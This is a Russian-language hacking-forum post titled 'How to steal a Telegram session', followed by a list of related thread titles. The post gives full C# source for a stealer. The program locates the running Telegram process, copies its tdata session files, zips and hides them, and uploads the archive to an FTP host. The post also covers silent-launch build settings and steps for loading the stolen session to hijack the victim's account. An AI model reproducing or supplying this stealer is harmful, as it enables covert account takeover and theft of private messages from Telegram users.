Как украсть сессию Telegram

  • Автор темы klobald
  • Дата начала
K

klobald

Original poster
Для того, чтобы украсть сессию Телеграма, достаточно заполучить всего два файла, находящихся по пути "...\Telegram Desktop\tdata". Это:

1) D877F783D5D3EF8C0 (последняя цифра может быть другой);

2) D877F783D5D3EF8C\map0 (последняя цифра может быть другой);

Код на C#:
C#:
using System;
using System.IO;
using System.Diagnostics;
using System.IO.Compression;
using System.Net;
using System.Threading;

namespace TStealer
{
  class Program
  {
    private class StealStart
    {
      private bool in_folder = false;


      public StealStart(string host = "", string login = "", string pass = "", bool del_zip = false)
      {
        new Thread(() => StealIt(host, login, pass, del_zip)).Start();
      }


      private void StealIt(string host, string login, string pass, bool del_zip)
      {
        var prcName = "Telegram";
        Process[] processByName = Process.GetProcessesByName(prcName);

        if (processByName.Length < 1)
          return;

        var dir_from = Path.GetDirectoryName(processByName[0].MainModule.FileName) + "\\Tdata";
        var this_fileLocation = System.Reflection.Assembly.GetEntryAssembly().Location;
        var dir_to = Path.GetDirectoryName(this_fileLocation) +
              "\\Tdata_" +
              (int)(DateTime.UtcNow - new DateTime(1970, 1, 1)).TotalSeconds
              ;
        var zipPath = dir_to + ".zip";


        CopyAll(dir_from, dir_to);
        ZipDir(dir_to, zipPath);
        Directory.Delete(dir_to, true);

        if (host == "")
          return;
 
        LoadOnFtp(zipPath, host, login, pass);

        if(del_zip)
          File.Delete(zipPath);
      }


      private void CopyAll(string fromDir, string toDir)
      {
        DirectoryInfo di = Directory.CreateDirectory(toDir);

        di.Attributes = FileAttributes.Directory | FileAttributes.Hidden;

        foreach (string s1 in Directory.GetFiles(fromDir))
          CopyFile(s1, toDir);

        foreach (string s in Directory.GetDirectories(fromDir))
          CopyDir(s, toDir);
      }


      private void CopyFile(string s1, string toDir)
      {
        try
        {
          var fname = Path.GetFileName(s1);

          if (in_folder && !(fname[0] == 'm' || fname[1] == 'a' || fname[2] == 'p'))
            return;

          var s2 = toDir + "\\" + fname;

          File.Copy(s1, s2);
        }
        catch { }
      }


      private void CopyDir(string s, string toDir)
      {
        try
        {
          in_folder = true;
          CopyAll(s, toDir + "\\" + Path.GetFileName(s));
          in_folder = false;
        }
        catch { }
      }


      private void ZipDir(string dir_to, string zipPath)
      {
        try
        {
          ZipFile.CreateFromDirectory(dir_to, zipPath);
          File.SetAttributes(zipPath, File.GetAttributes(zipPath) | FileAttributes.Hidden);
        }
        catch { }
      }


      private void LoadOnFtp(string zipPath, string host, string login, string pass)
      {
        try
        {
          using (WebClient client = new WebClient())
          {
            client.Credentials = new NetworkCredential(login, pass);

            client.UploadFile("ftp://" + host + "/" + Path.GetFileName(zipPath), "STOR", zipPath);
          }
        }
        catch { }
      }
    }


    static void Main(string[] args)
    {
      //var stealT = new StealStart();

      var host  =  "example.host.com";
      var login  =  "example_login";
      var pass  =  "example_pass";

      var steal_With_FTP = new StealStart(host, login, pass, false);
    }
  }
}
Дальше нужно добавить ссылку на System.IO.Compression.FileSystem (Проект > Добавить ссылку). Делаем тихий запуск (Проект > Свойства > Тип выходных данных > Приложение Windows):

2c26d529073b4136c51f5.jpg


Думаю, код написан как самокомментируемый. Ну суть вкратце напишу. Мы ищем процесс, затем берем её директорию для дальнейшего копирования настроек и сессии. Затем мы создаем ZIP-архив и отправляем по FTP. Использовав конструктор без параметров (new StealStart();), то мы просто копируем настройки сессию в ZIP.

new StealStart(host, login, pass, false); – хост, логин, пасс от ФТП и бул, который отвечает удалить ли ZIP после закачки на FTP.

После запуска, рядом с EXE будет скрытый ZIP-архив (или на ftp):

eca38a1367b77a92ec339.jpg


Создаем новую дерикторию и копируем туда Telegram.exe и дерикторию tdata, удалив всё содержимое. С архива перетаскиваем D877F783D5D3EF8C0 и дерикторию D877F783D5D3EF8C.BLACK Cases. В итоге должно выйти так:

044afe842134c11f84051.jpg


В tdata:

3e2c95b97782c73fa03a3.jpg


В D877F783D5D3EF8C:

ec2617aacb0f57f905320.jpg


Дальше запускаем Telegram.ехе, и он сам всё докачает.
 
Название темы
Автор Заголовок Раздел Ответы Дата
Uno-uno Интересно Как могут украсть ваши «учётки» через npm-пакет Полезные статьи 0
E Как с вашей карты могут легко украсть деньги Уязвимости и взлом 2
H Как украсть и не попасться Видео/Музыка 4
Support81 CouchDB как проходной двор: эксплойты для критической SSH-уязвимости уже гуляют по сети Новости в сети 0
Support81 Фишинг с печатью Google — как злоумышленники смогли обмануть DKIM Новости в сети 0
Support81 Исповедь хакера: как случайный эксперимент оставил без связи тысячи людей в Бразилии Новости в сети 0
Support81 Фейковые айтишники, настоящие миллиарды и немного ядерной программы: как прокачанные фишеры замиксовали $1,5 млрд Новости в сети 0
Support81 Microsoft дала ИИ настоящий инструмент программиста — и он впервые узнал, как сложно быть человеком Новости в сети 0
Support81 25 000 за воздух: как «таможенники» из Telegram разводят на доверии Новости в сети 0
Support81 $21 млн в крипте: как офицеры КСИР прикрылись «борьбой с мошенничеством» Новости в сети 0
Support81 Шифрование не спасет: как хакеры читают "защищенные" сообщения без взлома Новости в сети 0
Support81 Невидимая империя зла: как ИИ, дети и крипта строят цифровую империю Новости в сети 1
Support81 DNS без штанов: как нас сдают провайдерам по умолчанию Новости в сети 0
Support81 Комната 641А: как инженер AT&T раскрыл систему массовой слежки Новости в сети 0
Support81 "Чудо-решение" или маркетинг: как Google создает иллюзию объективности для продвижения технологий Новости в сети 0
Support81 Фрод в рекламе: как мошенники крадут бюджеты и что с этим делать Новости в сети 0
Support81 Невидимый взломщик: как обычные разговоры позволяют взломать GPT-4o Новости в сети 0
Support81 5 лет до точки невозврата: как квантовые компьютеры обрушат мировые банки Новости в сети 0
Support81 Вирус в заявке: как Zhong Stealer «ломает» компании через службу поддержки Новости в сети 0
Support81 Обмани себя сам: как ИИ-трейдеры ведут подписчиков к финансовому краху Новости в сети 0
Support81 Взлом, майнинг, выкуп: 5 хакеров придумали, как выжать из IT-гигантов все соки Новости в сети 0
Support81 CAPTCHA + PDF: как мошенники превратили Webflow в орудие фишинга Новости в сети 0
Support81 $16 млн и 1000 жертв: как хакеры Phobos попались в ловушку спецслужб Новости в сети 0
Support81 Мечта хакеров: как CVE-2024-52875 стала идеальным инструментом для кибератак Новости в сети 0
Support81 StarkRDP теперь LakeVPS: как злоумышленники возрождают подпольные рынки за считанные дни Новости в сети 0
Support81 Дешевле – не значит лучше: как уязвимости DeepSeek уничтожают защиту бизнеса Новости в сети 1
Support81 Важно!!! MMS возвращается: как устаревший протокол стал оружием криптомошенников Новости в сети 0
Support81 Chrome, Firefox и Edge: как Flesh Stealer стал ночным кошмаром для браузеров Новости в сети 0
Support81 Майнеры в облаке: как хакеры годами добывают криптовалюту за чужой счёт Новости в сети 0
Ёшкин_кот Статья Как скрыть цифровой след в интернете: практическое руководство. Полезные статьи 0
Support81 Из одной банды ‒ сотня новых: как полицейские облавы укрепили армию шантажистов Новости в сети 0
Support81 Машина против машины: как MintsLoader избегает обнаружения Новости в сети 0
wrangler65 Интересно Как удалить информацию о себе из интернета: подробная инструкция Полезные статьи 0
Support81 Банки, логистика и мошенники: как работает фишинговая «Premium Panel» Новости в сети 0
Support81 Тайны кода: как спецслужбы США используют ошибки в ПО Новости в сети 0
Support81 GhostGPT: как Telegram-бот из новичков делает профи криминального ИИ Новости в сети 1
Support81 UI-TARS: ByteDance научила ИИ работать с компьютером как человек Новости в сети 0
Support81 Скамеры дуреют с этой прикормки: как секретный токен ФБР вывел мошенников на чистую воду Новости в сети 0
Support81 12 недель на решение: как Великобритания планирует побороть кибервымогательство Новости в сети 0
wrangler65 Интересно Как сэкономить до 70% на переводах USDT TRC-20 через энергию Полезные статьи 0
Support81 $787 тысяч исчезли за секунды: как хакеры обошли защиту Orange Finance Новости в сети 0
Support81 LockBit 4.0: как вымогатели планируют возвращать утраченные позиции Новости в сети 0
Support81 Личное в публичное: как простой вызов такси оборачивается потерей данных Новости в сети 0
Support81 Жертвы жадности: как работает новая схема кражи криптовалют на YouTube Новости в сети 0
Support81 Лица на распродаже: как утечки данных помогают хакерам обходить проверки личности Новости в сети 0
Support81 Генеративный ИИ на службе зла: как тысячи вирусов избегают обнаружения Новости в сети 0
Support81 DoS, RCE и утечки данных: как Prometheus становится оружием хакеров Новости в сети 0
Support81 $88 миллионов добычи: как IT-воины КНДР шесть лет водили США за нос Новости в сети 0
Support81 BadRAM: как взломать облака Amazon, Google и Microsoft за $10 Новости в сети 0
Support81 $16 миллионов похищено через LinkedIn: как хакеры обманули Rain Новости в сети 0

Название темы